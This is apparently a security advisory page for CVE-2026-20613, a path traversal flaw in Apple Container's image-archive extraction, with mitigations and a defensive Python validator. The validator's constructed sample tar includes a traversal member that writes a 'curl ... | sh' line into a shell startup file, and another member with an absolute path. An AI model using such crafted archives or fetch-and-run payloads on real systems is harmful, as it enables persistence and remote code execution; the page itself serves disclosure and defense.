Cyber Resilience

CVE-2026-20613

Severity: High · Public PoC

Published: 23 January 2026
Modified: 27 January 2026
KEV Added: not listed
Patch: container 0.8.0 / containerization 0.21.0
CVSS Score v3.1: 7.8 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.0001 (1.9th percentile)
Risk Priority: 16 (60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2026-20613 is a high-severity Path Traversal (CWE-22) vulnerability in Apple Container. Its CVSS base score is 7.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Registry Run Keys / Startup Folder (T1547.001); ranked at the 1.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-20613 is a path traversal vulnerability (CWE-22) in the ArchiveReader.extractContents() function, which is used by the cctl image load and container image load features. This function lacks pathname validation when extracting archive members, allowing a specially crafted archive to place files into arbitrary user-writable locations on the system via relative pathnames. The vulnerability affects the container and containerization components, with a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A local attacker exploits this by getting a user to load a maliciously constructed archive through cctl image load or container image load. No privileges are required and attack complexity is low, but user interaction (loading the archive) is necessary. Successful exploitation lets the attacker create or overwrite files in any directory the loading user can write to, which is enough for high confidentiality, integrity and availability impact: the attacker chooses the file name and contents, so user configuration, shell startup files and other autostart artifacts under the user's home directory are all in reach, and the write itself is a foothold for further compromise.

The GitHub Security Advisory (GHSA-cq3j-qj2h-6rv3) confirms the issue and states it is addressed in container version 0.8.0 and containerization version 0.21.0, recommending users upgrade to these patched releases for mitigation.
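The missing check described above is the per-member pathname validation that an extractor must do before joining an archive entry name onto the destination directory. The following is an added, constructed example and not Apple's code: it builds a small in-memory tar with one benign member and two hostile ones (a `../` relative escape and an absolute path), shows where a join-and-write extractor with no validation would put them, and extracts only members whose resolved destination stays inside the extraction root. It goes slightly beyond the page in two ways: it resolves the target against the real path of the root, so a symlink planted by an earlier member cannot redirect a later write, and it refuses link members outright. The destination directory, member names and payloads are all assumptions made for the demonstration.

```python
"""Archive-member pathname validation of the kind the advisory says
ArchiveReader.extractContents() lacked before container 0.8.0 /
containerization 0.21.0. Constructed example, not Apple's code."""
import io
import posixpath
import tarfile
import tempfile
from pathlib import Path, PurePosixPath


def build_sample_tar() -> bytes:
    """Constructed sample: a benign manifest plus two traversal members."""
    members = [
        ("manifest.json", b"{}"),
        ("../../.zshrc", b"curl http://example.invalid/x | sh\n"),  # relative escape
        ("/tmp/pwned", b"x"),                                        # absolute path
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members:
            info = tarfile.TarInfo(name=name)  # TarInfo does not sanitise names
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def naive_target(root: str, name: str) -> str:
    """Where an extractor that just joins root + member name would write."""
    return posixpath.normpath(posixpath.join(root, name))


def validate_member(root: Path, member: tarfile.TarInfo) -> Path:
    """Return the destination path for `member`, or raise ValueError if unsafe."""
    root = root.resolve()
    name = PurePosixPath(member.name)
    if name.is_absolute():
        raise ValueError("absolute member path")
    if ".." in name.parts:
        raise ValueError("parent-directory reference")
    # resolve() follows symlinks already present under root, so a link written
    # by an earlier member cannot redirect this write outside the root.
    target = (root / member.name).resolve()
    if target != root and root not in target.parents:
        raise ValueError("escapes extraction root")
    if not (member.isfile() or member.isdir()):
        raise ValueError("unsupported member type")  # symlinks, hardlinks, devices
    return target


def safe_extract(data: bytes, dest: Path) -> tuple[list[str], dict[str, str]]:
    """Extract validated members into `dest`; return (extracted, rejected)."""
    extracted: list[str] = []
    rejected: dict[str, str] = {}
    dest.mkdir(parents=True, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for member in tar:
            try:
                target = validate_member(dest, member)
            except ValueError as err:
                rejected[member.name] = str(err)
                continue
            if member.isdir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(tar.extractfile(member).read())
            extracted.append(member.name)
    return extracted, rejected


def run_demo() -> dict:
    """Extract the sample into a throwaway directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "image"
        extracted, rejected = safe_extract(build_sample_tar(), dest)
        return {
            "extracted": extracted,
            "rejected": rejected,
            "manifest_written": (dest / "manifest.json").read_bytes() == b"{}",
            # the '../../.zshrc' member would have landed here without validation
            "escaped_file_written": (Path(tmp) / ".zshrc").exists(),
        }


if __name__ == "__main__":
    root = "/Users/alice/image"  # assumed extraction root for illustration
    for name in ("manifest.json", "../../.zshrc", "/tmp/pwned"):
        print(f"unvalidated: {name!r} -> {naive_target(root, name)}")
    print(run_demo())
```

The two name checks alone would stop both members in the sample; the `resolve()` containment check is what closes the symlink variant, where a benign-looking name such as `layers/link/config` points through a link member to a directory outside the root.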


Vulnerability details

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0.

CWE(s)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1547.001 Registry Run Keys / Startup Folder Persistence
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
T1554 Compromise Host Software Binary Persistence
Adversaries may modify host software binaries to establish persistent access to systems.
Why these techniques?

Path traversal gives an arbitrary file write into user-writable locations, which is exactly what an attacker needs to drop an autostart executable (T1547.001) or to overwrite a host binary the user runs (T1554) for persistence and execution. Note that the Registry half of T1547.001 does not apply on macOS, where Apple Container runs; the mapping rests on the startup-folder analogy, and the macOS-native equivalent of that write is a user launch agent under ~/Library/LaunchAgents (T1543.001).

Confidence: MEDIUM · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-28827 (same vendor: Apple)
CVE-2026-20614 (same vendor: Apple)
CVE-2026-20660 (same vendor: Apple)
CVE-2026-20615 (same vendor: Apple)
CVE-2026-20688 (same vendor: Apple)
CVE-2022-50890 (same vendor: Apple)
CVE-2026-28855 (same vendor: Apple)
CVE-2026-28860 (same vendor: Apple)
CVE-2026-20677 (same vendor: Apple)
CVE-2025-24129 (same vendor: Apple)

Affected Assets

apple / container: versions before 0.8.0 (fixed in 0.8.0)
apple / containerization: versions before 0.21.0 (fixed in 0.21.0)

Mitigating Controls (NIST 800-53 r5)

prevent · SI-10 (Information Input Validation): requires validating untrusted input before it is acted on, which here means checking each archive member's pathname (rejecting absolute paths, parent-directory references and any destination that resolves outside the extraction root) before ArchiveReader.extractContents() writes it. This is the control the fix implements.

prevent · SI-2 (Flaw Remediation): timely identification, reporting and patching of the flaw; upgrade to container 0.8.0 and containerization 0.21.0.

prevent · AC-6 (Least Privilege): because the write is confined to locations the loading user can already write, least privilege does not stop the write but bounds its reach; loading images from a dedicated account with a minimal home directory and no write access to shared tool paths limits what a crafted archive can overwrite.
